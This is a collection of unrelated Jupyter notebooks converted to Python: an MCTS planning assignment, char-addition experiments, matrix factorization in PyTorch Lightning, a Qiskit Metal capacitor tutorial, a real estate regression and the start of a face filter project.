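    def propagate(self, reward):
        self.times_visited += 1

def plan_mcts_sketch(root, n_iters=10):
    for _ in range(n_iters):
        node = root.select_best_leaf()            # select
        if node.is_done:
            node.propagate(0)                     # terminal: propagate zero reward
        else:
            best_leaf = node.expand()             # expand
            rollout_reward = best_leaf.rollout()  # simulate
            best_leaf.propagate(rollout_reward)   # propagate

root_stub = StubLeaf()
plan_mcts_sketch(root_stub, n_iters=5)
```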
# ## Plan and execute
# In this section, we use the MCTS implementation to find optimal policy.
root_observation = env.reset()
root_snapshot = env.get_snapshot()
root = Root(root_snapshot,root_observation)
#plan from root:
plan_mcts(root,n_iters=1000)
# +
from IPython.display import clear_output
from itertools import count
from gym.wrappers import Monitor
total_reward = 0 #sum of rewards
test_env = loads(root_snapshot) #env used to show progress
for i in count():
#get best child
best_child = <select child with highest mean reward>
#take action
s,r,done,_ = test_env.step(best_child.action)
#show image
clear_output(True)
plt.title("step %i"%i)
plt.imshow(test_env.render('rgb_array'))
plt.show()
total_reward += r
if done:
print("Finished with reward = ",total_reward)
break
#discard unrealized part of the tree [because not every child matters :(]
for child in root.children:
if child != best_child:
child.safe_delete()
#declare best child a new root
root = Root.from_node(best_child)
assert not root.is_leaf(), "We ran out of tree! Need more planning! Try growing tree right inside the loop."
#you may want to expand tree here
#<your code here>
# -
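# A common way to pick the action in the loop above is to take the child with the highest mean reward; a minimal sketch with a fake child class (names are illustrative):

```python
class FakeChild:
    """Stand-in for a tree node carrying value_sum / times_visited statistics."""
    def __init__(self, action, value_sum, times_visited):
        self.action = action
        self.value_sum = value_sum
        self.times_visited = times_visited
    def get_mean_value(self):
        return self.value_sum / self.times_visited if self.times_visited else 0.0

children = [FakeChild(0, 30.0, 10), FakeChild(1, 50.0, 10)]
best_child = max(children, key=lambda c: c.get_mean_value())
```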
# ### Submit to Coursera
# +
from submit import submit_mcts
submit_mcts(total_reward, <EMAIL>, <TOKEN>)
# -
# ## More stuff
#
# There's a few things you might want to try if you want to dig deeper:
#
# ### Node selection and expansion
#
# "Analyze this" assignment
#
# UCB-1 is a weak bound as it relies on a very general inequality (Hoeffding's, to be exact).
# * Try playing with alpha. The theoretically optimal alpha for CartPole is 200 (max reward).
# * Try using a different exploration strategy (Bayesian UCB, for example)
# * Expand not all but several random actions per `expand` call. See __the notes below__ for details.
#
# The goal is to find out what gives the optimal performance for `CartPole-v0` for different time budgets (i.e. different `n_iters` in `plan_mcts`).
#
# Evaluate your results on `Acrobot-v1` - do the results change and, if so, how can you explain it?
#
#
# ### Atari-RAM
#
# "Build this" assignment
#
# Apply MCTS to play atari games. In particular, let's start with ```gym.make("MsPacman-ramDeterministic-v0")```.
#
# This requires two things:
# * Slightly modify WithSnapshots wrapper to work with atari.
#
# * Atari has a special interface for snapshots:
# ```
# snapshot = self.env.ale.cloneState()
# ...
# self.env.ale.restoreState(snapshot)
# ```
# * Try it on the env above to make sure it does what you told it to.
#
# * Run MCTS on the game above.
# * Start with small tree size to speed-up computations
# * You will probably want to rollout for 10-100 steps (t_max) for starters
# * Consider using discounted rewards (see __notes at the end__)
# * Try a better rollout policy
#
#
# ### Integrate learning into planning
#
# Planning on each iteration is a costly thing to do. You can speed things up drastically if you train a classifier to predict which action will turn out to be best according to MCTS.
#
# To do so, just record which action did the MCTS agent take on each step and fit something to [state, mcts_optimal_action]
# * You can also use optimal actions from discarded states to get more (dirty) samples. Just don't forget to fine-tune without them.
# * It's also worth a try to use P(best_action|state) from your model to select best nodes in addition to UCB
# * If your model is lightweight enough, try using it as a rollout policy.
#
# While CartPole is glorious enough, try expanding this to ```gym.make("MsPacmanDeterministic-v0")```
# * See previous section on how to wrap atari
#
# * Also consider what [AlphaGo Zero](https://deepmind.com/blog/alphago-zero-learning-scratch/) did in this area.
#
# ### Integrate planning into learning
# _(this will likely take long time, better consider this as side project when all other deadlines are met)_
#
# Incorporate planning into the agent architecture.
#
# The goal is to implement [Value Iteration Networks](https://arxiv.org/abs/1602.02867)
#
# For starters, remember [week7 assignment](https://github.com/yandexdataschool/Practical_RL/blob/master/week7/7.2_seminar_kung_fu.ipynb)? If not, use [this](http://bit.ly/2oZ34Ap) instead.
#
# You will need to switch it into a maze-like game, consider MsPacman or the games from week7 [Bonus: Neural Maps from here](https://github.com/yandexdataschool/Practical_RL/blob/master/week7/7.3_homework.ipynb).
#
# You will need to implement a special layer that performs value iteration-like update to a recurrent memory. This can be implemented the same way you did attention from week7 or week8.
# ## Notes
#
#
# #### Assumptions
#
# The full list of assumptions is
# * __Finite actions__ - we enumerate all actions in `expand`
# * __Episodic (finite) MDP__ - while technically it works for infinite MDPs, we rollout for $10^4$ steps. If your MDP is known to be infinite, adjust `t_max` to something more reasonable.
# * __No discounted rewards__ - we assume $\gamma=1$. If that isn't the case, you only need to change two lines in `rollout` and use `my_R = r + gamma*child_R` for `propagate`
# * __pickleable env__ - won't work if e.g. your env is connected to a web-browser surfing the internet. For custom envs, you may need to modify get_snapshot/load_snapshot from `WithSnapshots`.
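# If you do switch to discounted rewards, the rollout return folds back-to-front as $R_t = r_t + \gamma R_{t+1}$; a small sketch:

```python
def discounted_return(rewards, gamma=0.99):
    """Fold rewards back-to-front: R_t = r_t + gamma * R_{t+1}."""
    R = 0.0
    for r in reversed(rewards):
        R = r + gamma * R
    return R
```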
#
# #### On `get_best_leaf` and `expand` functions
#
# This MCTS implementation only selects leaf nodes for expansion.
# This doesn't break things because `expand` adds all possible actions. Hence, all non-leaf nodes are by design fully expanded and shouldn't be selected.
#
# If you want to only add a few random actions on each expand, you will also have to modify `get_best_leaf` to consider returning non-leafs.
#
# #### Rollout policy
#
# We use a simple uniform policy for rollouts. This introduces a negative bias toward good states that can be ruined completely by a single random bad action. As a simple analogy: if you tend to roll out with a uniform policy, you'd better not use sharp knives or walk near cliffs.
#
# You can improve that by integrating a reinforcement _learning_ algorithm with a computationally light agent. You can even train this agent on optimal policy found by the tree search.
#
# #### Contributions
# * Reusing some code from 5vision [solution for deephack.RL](https://github.com/5vision/uct_atari), code by <NAME>
# * Using some code from [this gist](https://gist.github.com/blole/dfebbec182e6b72ec16b66cc7e331110)
|
week6_outro/practice_mcts.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda root]
# language: python
# name: conda-root-py
# ---
# ## char addition
# * DIGITS = 2
#
# * one example
#
# * original input: **12 + 2**, output: **15**
#
# after encoding
# * encoded input: **12+2#**, output: **15#**
#
# and **#** used to pad the strings to same length
#
# ```
# >>> train_X.shape, train_y.shape
# >>> (5050, 5), (5050, 3, 12)
# ```
# 
#
# ```
# >>> reversed_X = train_X[:, ::-1]
# >>> combined_X = np.concatenate([train_X, reversed_X], axis=0)
# >>> combined_y = np.concatenate([train_y, train_y], axis=0)
# >>> combined_X.shape, combined_y.shape
# >>> (10100, 5), (10100, 3, 12)
# ```
# 
#
# Why does the model trained on more data perform worse?
#
# after reversing, the above encoded input/output will be
# ```
# reversed input: #2+21, output: #51
# ```
# presumably, such reversing will confuse the model, as **2+21#** --> **23#**.
#
# Thus, we can drop the padding symbol and add an end-of-string symbol
#
# * one example
#
# * original input: **1+2**, output: **3**
# * encoded input: **1+2##**, output: **3##** (2 **#** padded in order to keep same sequence length)
#
# new encoding manner
# * encoded input: **1+2#**, output: **3#** (one **#** just acts as end-of-line symbol which exists in every string)
#
# * second example
# * original input: **25+30**, output: **55**
# * encoded input: **25+30#**, output: **55#**
#
# thus, lengths of input/output will no longer be fixed
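# The reversal-and-concatenation experiment described above boils down to a couple of numpy operations; a small self-contained sketch (the token ids below are made up for illustration):

```python
import numpy as np

PAD = 0  # id of the '#' padding symbol (illustrative)
# Two integer-encoded sequences of length 5, the first padded at the end.
batch = np.array([[1, 2, 3, 2, PAD],
                  [2, 5, 3, 3, 4]])
targets = np.array([[7, 8], [9, 9]])  # dummy targets, just carried along

reversed_batch = batch[:, ::-1]                        # '12+2#' -> '#2+21'
combined_X = np.concatenate([batch, reversed_batch], axis=0)
combined_y = np.concatenate([targets, targets], axis=0)
```

# Note how the pad symbol moves to the front of the reversed sequence, which is exactly the ambiguity discussed above.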
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# +
#csv_file_1 = '/home/huizhu/huizhu/feynman/addition/logs/logger_1.csv'
csv_file_2 = '/home/huizhu/huizhu/feynman/addition/logs/logger.csv'
#df_1 = pd.read_csv(csv_file_1)
df_1 = pd.read_csv(csv_file_2)
plt.plot(df_1.epoch, df_1.acc, label='training data')
plt.plot(df_1.epoch, df_1.val_acc, label='validation data')
plt.xlabel('epoch')
plt.ylabel('accuracy')
plt.legend()
plt.show()
# -
def plot(csv_file):
    df = pd.read_csv(csv_file)
    plt.plot(df.epoch, df.acc, label='train')
    plt.plot(df.epoch, df.val_acc, label='valid')
    plt.xlabel('epoch')
    plt.ylabel('accuracy')
    plt.legend()
    plt.show()
csv_file = '/home/huizhu/huizhu/feynman/addition/logs/logger_2.csv'
plot(csv_file)
|
tests/char_addition.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# import os
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import numpy as np
import torch
print("PyTorch version:",torch.__version__)
if torch.cuda.is_available():
for i in range(torch.cuda.device_count()):
        print(f"CUDA GPU {i+1}: {torch.cuda.get_device_name(i)} [Compute Capability: {torch.cuda.get_device_capability(i)[0]}.{torch.cuda.get_device_capability(i)[1]}]")
device = torch.device('cuda')
kwargs = {'num_workers': 8, 'pin_memory': True}
torch.backends.cudnn.benchmark = True
else:
device = torch.device('cpu')
print("CUDA GPU is not available. :(")
import torch.nn as nn
from torch.utils.data import DataLoader, Dataset
import pytorch_lightning as pl
from pytorch_lightning.loggers import TensorBoardLogger
print ("PyTorch Lightning version:",pl.__version__)
import scipy.sparse as sp
from argparse import Namespace
from utilities.custom_lightning import CSVProfiler
import logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logging.debug("Logging enabled at DEBUG level.")
from constants import (SEED, DATA_DIR, LOG_DIR, TRAIN_DATA_PATH, VAL_DATA_PATH, TEST_DATA_PATH)
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
# -
NAME = r'BasicMatrixFactorization'
SAVE_PATH = DATA_DIR+r'/'+NAME+r'.pt'
PROFILE_PATH = LOG_DIR+r'/'+NAME+r'/profile.csv'
# +
class Interactions(Dataset):
"""
    Dataset over the nonzero entries of a sparse interaction matrix (COO format).
"""
def __init__(self, matrix):
self.matrix = matrix
self.n_users = self.matrix.shape[0]
self.n_items = self.matrix.shape[1]
def __getitem__(self, index):
row = self.matrix.row[index]
col = self.matrix.col[index]
val = self.matrix.data[index]
return (row, col), val
def __len__(self):
return self.matrix.nnz
interaction = Interactions
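# How `__getitem__` reads samples can be seen on a tiny COO matrix: each index maps to one observed (user, item, rating) triple. The sketch below inlines that indexing so it runs standalone (toy numbers, not the real data):

```python
import numpy as np
import scipy.sparse as sp

# Three observed ratings in a 3x4 user-item matrix, stored in COO format.
rows = np.array([0, 1, 2])
cols = np.array([1, 3, 0])
vals = np.array([5.0, 3.0, 4.0])
matrix = sp.coo_matrix((vals, (rows, cols)), shape=(3, 4))

# What __getitem__(index) returns: ((row, col), value) for the index-th nonzero.
index = 1
sample = ((matrix.row[index], matrix.col[index]), matrix.data[index])
```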
# +
class TestingCallbacks(pl.Callback):
def on_test_start(self, trainer, pl_module):
global y_hat
y_hat = sp.dok_matrix((hparams.total_users, hparams.total_items), dtype=np.float32)
def on_test_end(self, trainer, pl_module):
logging.debug(f"Non-zero values in prediction matrix: {y_hat.nnz:,}")
        sp.save_npz(DATA_DIR+r'/'+NAME+r'-y_hat.npz',y_hat.tocoo())
# -
class BasicMatrixFactorization(pl.LightningModule):
def __init__(self, hparams):
super(BasicMatrixFactorization, self).__init__()
self.hparams = hparams
self.user_factors = nn.Embedding(hparams.total_users, hparams.n_factors, sparse=hparams.sparse)
self.item_factors = nn.Embedding(hparams.total_items, hparams.n_factors, sparse=hparams.sparse)
def forward(self, users, items):
predictions = (self.user_factors(users) * self.item_factors(items)).sum(dim=1, keepdim=True)
return predictions.squeeze()
def MSELoss(self, logits, labels):
return nn.functional.mse_loss(logits, labels)
def training_step(self, train_batch, batch_idx):
x, y = train_batch
row, column = x
row = row.long()
column = column.long()
logits = self.forward(row,column)
loss = self.MSELoss(logits, y)
logs = {'train_loss': loss}
return {'loss': loss, 'log': logs}
def validation_step(self, val_batch, batch_idx):
x, y = val_batch
row, column = x
row = row.long()
column = column.long()
logits = self.forward(row,column)
loss = self.MSELoss(logits, y)
return {'val_loss': loss}
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()
tensorboard_logs = {'val_loss': avg_loss}
return {'avg_val_loss': avg_loss, 'log': tensorboard_logs}
def test_step(self, test_batch, batch_idx):
x, y = test_batch
row, column = x
row = row.long()
column = column.long()
logits = self.forward(row,column)
loss = self.MSELoss(logits, y)
logits_array = logits.cpu().numpy()
r = row.cpu().numpy()
c = column.cpu().numpy()
for i in range(len(logits_array)):
y_hat[r[i],c[i]]=logits_array[i]
return {'test_loss': loss}
def test_epoch_end(self, outputs):
avg_loss = torch.stack([x['test_loss'] for x in outputs]).mean()
tensorboard_logs = {'MSE': avg_loss}
print(f"Test Mean Squared Error (MSE): {avg_loss}")
return {'avg_test_loss': avg_loss, 'log': tensorboard_logs}
def prepare_data(self):
self.train_dataset = sp.load_npz(TRAIN_DATA_PATH)
self.val_dataset = sp.load_npz(VAL_DATA_PATH)
self.test_dataset = sp.load_npz(TEST_DATA_PATH)
def train_dataloader(self):
return DataLoader(interaction(self.train_dataset), batch_size=self.hparams.batch_size, shuffle=True)
def val_dataloader(self):
return DataLoader(interaction(self.val_dataset), batch_size=self.hparams.batch_size, shuffle=False)
def test_dataloader(self):
return DataLoader(interaction(self.test_dataset), batch_size=self.hparams.batch_size, shuffle=False)
def configure_optimizers(self):
optimizer = torch.optim.SGD(self.parameters(), lr=self.hparams.learning_rate)
return optimizer
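# The prediction in `forward` is just the dot product of a user's and an item's factor rows; in plain numpy (the toy factor values below are made up):

```python
import numpy as np

# Toy factor matrices: 2 users x 2 factors, 2 items x 2 factors.
U = np.array([[1.0, 2.0],
              [0.5, 1.0]])
V = np.array([[2.0, 0.0],
              [1.0, 3.0]])

def predict(user, item):
    """Predicted rating = dot product of the user and item factor vectors."""
    return float(U[user] @ V[item])
```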
uxm = sp.load_npz(TRAIN_DATA_PATH)
total_users = uxm.shape[0]
total_items = uxm.shape[1]
del uxm
# +
hparams = Namespace(**{
'batch_size': 1024,
'learning_rate': 0.99999,
'n_factors': 20,
'sparse': True,
'max_epochs': 100,
'total_users': total_users,
'total_items': total_items
})
profiler = CSVProfiler(output_path=PROFILE_PATH,verbose=True)
logger = TensorBoardLogger(LOG_DIR, name=NAME)
model = BasicMatrixFactorization(hparams)
trainer = pl.Trainer(max_epochs=hparams.max_epochs,
benchmark=True,
profiler=profiler,
logger=logger,
gpus=1,
fast_dev_run=False,
callbacks=[TestingCallbacks()])
trainer.fit(model)
# -
trainer.test()
# +
# torch.save(model.state_dict(), SAVE_PATH)
# +
# loaded_model = BasicMatrixFactorization(hparams)
# loaded_model.load_state_dict(torch.load(SAVE_PATH))
# loaded_model.eval()
# print("Model's state_dict:")
# for param_tensor in loaded_model.state_dict():
# print(param_tensor, "\t", loaded_model.state_dict()[param_tensor].size())
# +
# loaded_model.state_dict()['user_factors.weight']
# +
# loaded_model.state_dict()['item_factors.weight']
|
train-uxml-basic-matrix-factorization.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Coding für Führungskräfte - Test Notebook
#
# 
# This notebook is only meant as a test to check that you can run the notebooks correctly. Simply click on the next box (code cell) and press the combination **Shift** and **Enter** on your keyboard.
# +
import numpy as np
print('Ja, alles funktioniert!')
# -
# If the output `Ja, alles funktioniert!` appears, everything works fine! Thanks for the test!
#
# Your Coding für Führungskräfte team
#
|
resources/test/Test.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # QComponent - 3-fingers capacitor
# #### Standard imports
# +
# %reload_ext autoreload
# %autoreload 2
# %config IPCompleter.greedy=True
# Qiskit Metal
from qiskit_metal import designs
from qiskit_metal import MetalGUI, Dict
# -
# #### Define design object from design_planar and start GUI
# +
design = designs.DesignPlanar()
gui = MetalGUI(design)
# enable rebuild of the same component
design.overwrite_enabled = True
# -
# #### Import the device and inspect the default options
from qiskit_metal.qlibrary.lumped.cap_3_interdigital import Cap3Interdigital
Cap3Interdigital.get_template_options(design)
# #### Instantiate the capacitive device
design.delete_all_components()
c1 = Cap3Interdigital(design, 'C1')
gui.rebuild()
gui.autoscale()
# #### Change something about it
c1.options['finger_length'] = '200um'
gui.rebuild()
gui.autoscale()
# + tags=["nbsphinx-thumbnail"]
gui.screenshot()
|
docs/tut/quick-topics/QComponent-3-fingers-capacitor.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="BHxRfxPtZ7ql" executionInfo={"status": "ok", "timestamp": 1644558512409, "user_tz": -330, "elapsed": 712, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# + id="k8O3tEddaeAB" executionInfo={"status": "ok", "timestamp": 1644558564566, "user_tz": -330, "elapsed": 6, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
datasets= pd.read_csv('/content/sample_data/Real estate.csv')
# + colab={"base_uri": "https://localhost:8080/", "height": 655} id="cszoECaca9BD" executionInfo={"status": "ok", "timestamp": 1644558568892, "user_tz": -330, "elapsed": 570, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="d1f4dbc1-ff77-4e8c-9c1e-01a40dc009af"
datasets
# + colab={"base_uri": "https://localhost:8080/"} id="CNHVLQ6PbIb-" executionInfo={"status": "ok", "timestamp": 1644558585583, "user_tz": -330, "elapsed": 518, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="184ba763-1b66-4e38-9b1d-fe5bbe3cd7ef"
X= datasets.iloc[:,1:7].values
X
# + colab={"base_uri": "https://localhost:8080/"} id="1gMEiN7-clOG" executionInfo={"status": "ok", "timestamp": 1644558613990, "user_tz": -330, "elapsed": 8, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="02de4d0a-2a31-4b4c-ff88-0139d970d2b5"
y=datasets.iloc[:,-1].values
y
# + colab={"base_uri": "https://localhost:8080/"} id="vCzGLmWBdC1R" executionInfo={"status": "ok", "timestamp": 1644558622419, "user_tz": -330, "elapsed": 495, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="834d7915-a502-4c69-db4e-a808654e2b84"
X=X.reshape(414,6)
X
# + colab={"base_uri": "https://localhost:8080/"} id="St4Fag_LdRXU" executionInfo={"status": "ok", "timestamp": 1644558628024, "user_tz": -330, "elapsed": 493, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="b1aa4942-5568-485f-e94a-33d49820a4c5"
y=y.reshape(414,)
y
# + id="kDT7E91fWHc-" executionInfo={"status": "ok", "timestamp": 1644559724976, "user_tz": -330, "elapsed": 515, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
#from sklearn.compose import ColumnTransformer
#from sklearn.preprocessing import OneHotEncoder
# + id="ZqKt-c9CWI_p" executionInfo={"status": "ok", "timestamp": 1644559727170, "user_tz": -330, "elapsed": 8, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
#encoder = OneHotEncoder()
#ct = ColumnTransformer(transformers=[('encoder',encoder, [3])], remainder='passthrough')
# + id="tQjnUDMoWNAh" executionInfo={"status": "ok", "timestamp": 1644559729052, "user_tz": -330, "elapsed": 6, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
#X = ct.fit_transform(X)
# + id="XC4H8JuqWPgx" executionInfo={"status": "ok", "timestamp": 1644559730907, "user_tz": -330, "elapsed": 9, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
#X
# + [markdown] id="SMf7pqztq9Ih"
# Splitting the dataset
# + id="DQpw4zLeqycN" executionInfo={"status": "ok", "timestamp": 1644559735323, "user_tz": -330, "elapsed": 489, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
from sklearn.model_selection import train_test_split
# + id="e6y9bRSNrLvb" executionInfo={"status": "ok", "timestamp": 1644559737062, "user_tz": -330, "elapsed": 3, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.1, random_state= 25)
# + colab={"base_uri": "https://localhost:8080/"} id="kxl71Zgkrthd" executionInfo={"status": "ok", "timestamp": 1644559742990, "user_tz": -330, "elapsed": 902, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="9daeac8f-637e-41e5-ca2d-e16cc88f80c7"
print(X_train)
# + colab={"base_uri": "https://localhost:8080/"} id="jBalbLC8r1Kq" executionInfo={"status": "ok", "timestamp": 1644559760541, "user_tz": -330, "elapsed": 524, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="d3f26c6a-f01e-4e15-e3ae-2490e6701d10"
print(y_train)
# + colab={"base_uri": "https://localhost:8080/"} id="uAJ_OUynr74m" executionInfo={"status": "ok", "timestamp": 1644559777138, "user_tz": -330, "elapsed": 466, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="85ea7cc8-981e-4511-b505-0e8f0789f91b"
print(X_test)
# + colab={"base_uri": "https://localhost:8080/", "height": 304} id="cheb5o3psGN-" executionInfo={"status": "error", "timestamp": 1644559781428, "user_tz": -330, "elapsed": 461, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="3429de82-9c1b-490b-844f-faf8489a598b"
print(len(X_test))
print(len(X_train))
# + colab={"base_uri": "https://localhost:8080/"} id="gIiEEeigsfhZ" executionInfo={"status": "ok", "timestamp": 1644558985195, "user_tz": -330, "elapsed": 10, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="d957b21d-e126-4b5c-8944-676fbf28a593"
print(y_test)
# + colab={"base_uri": "https://localhost:8080/"} id="5ldAsxOOsrGK" executionInfo={"status": "ok", "timestamp": 1644558989629, "user_tz": -330, "elapsed": 481, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="efa8f27a-f1f9-4786-b2f9-35a223a2b67d"
print(len(y_test))
print(len(y_train))
X_train.shape
# + [markdown] id="CBznXB0ZtH-B"
# Model Setup
# + id="utt3XjwAtF6I" executionInfo={"status": "ok", "timestamp": 1644558994919, "user_tz": -330, "elapsed": 541, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
from sklearn.linear_model import LinearRegression
# + id="hNs35lSEtTJ2" executionInfo={"status": "ok", "timestamp": 1644558996754, "user_tz": -330, "elapsed": 5, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
model = LinearRegression()
# + [markdown] id="R6hlWppqtbGy"
# Training
# + colab={"base_uri": "https://localhost:8080/"} id="z8IeXlWutc74" executionInfo={"status": "ok", "timestamp": 1644559001167, "user_tz": -330, "elapsed": 515, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}} outputId="651bea5e-6e86-4ab3-ee73-085df8c07b3f"
model.fit(X_train, y_train)
# + [markdown] id="EybL-1kDtqE7"
# Predicting
# + id="ftJARexMtxRj" executionInfo={"status": "ok", "timestamp": 1644559007403, "user_tz": -330, "elapsed": 543, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GhCxjShlk4YOYDsXGXNtsHDSzxLLoMDwaWO3AjN=s64", "userId": "03850413650455122425"}}
y_pred = model.predict(X_test)
# +
[y_test, y_pred]
# + [markdown] id="oULYJnaxvtw8"
# Evaluating Model
# +
from sklearn.metrics import r2_score
# +
r2_score(y_test, y_pred)
# +
X_test[0]
# + [markdown] id="xRnjhARA5T2A"
# Predicting on single value
# +
x1 = [[2012.917, 32, 84.87, 10, 24.98, 121.54]]
y1 = model.predict(x1)
print(y1)
Real_Estate.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Face Filter
#
# By <NAME> and <NAME>.<br>
# Created for the CSCI 4622 - Machine Learning final project.
# + pycharm={"name": "#%%\n"}
import os
import io
import json
import requests
import numpy as np
import matplotlib.pyplot as plt
from typing import Tuple
from PIL import Image
from keras import Sequential
from keras.layers import Conv2D, MaxPooling2D, BatchNormalization, Flatten, Dense, Dropout
# -
# ### Problem Description
#
# Face filter solves the problem that many social media companies face: detecting faces in an image and applying a filter
# to them. Facebook, Snapchat, TikTok, and many more companies use this technology to make applying filters to images much
# easier, without requiring their users to manually tell the software where their face is. We wanted to create our own
# version of this for our final project in order to learn how it is done.
#
# This project is completed in two parts. First, this notebook serves as a detailed description of our project, our EDA
# procedure, model analysis, and also contains code for generating, training, and saving the final model we chose to work
# with. The other part of our project is a Python script that repeatedly takes an image from a web camera, uses the model
# generated by this notebook to detect your face, applies a "bulge" filter to it, and displays the result to the user.
# This can be found in the main.py file.
#
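The "bulge" effect mentioned above can be sketched as an inverse pixel remapping. This is a hypothetical standalone version for illustration only; the actual implementation lives in main.py and may differ:

```python
import numpy as np

def bulge(image: np.ndarray, cx: int, cy: int, radius: float, strength: float = 0.5) -> np.ndarray:
    # Inverse-map every output pixel: pixels inside the radius are sampled
    # from a point pulled toward the center (cx, cy), producing a magnifying
    # bulge. Pixels at or beyond the radius are left untouched.
    h, w = image.shape[:2]
    ys, xs = np.indices((h, w), dtype=float)
    dx, dy = xs - cx, ys - cy
    r = np.sqrt(dx**2 + dy**2)
    scale = np.where(r < radius, (r / radius) ** strength, 1.0)
    src_x = np.clip(cx + dx * scale, 0, w - 1).astype(int)
    src_y = np.clip(cy + dy * scale, 0, h - 1).astype(int)
    return image[src_y, src_x]

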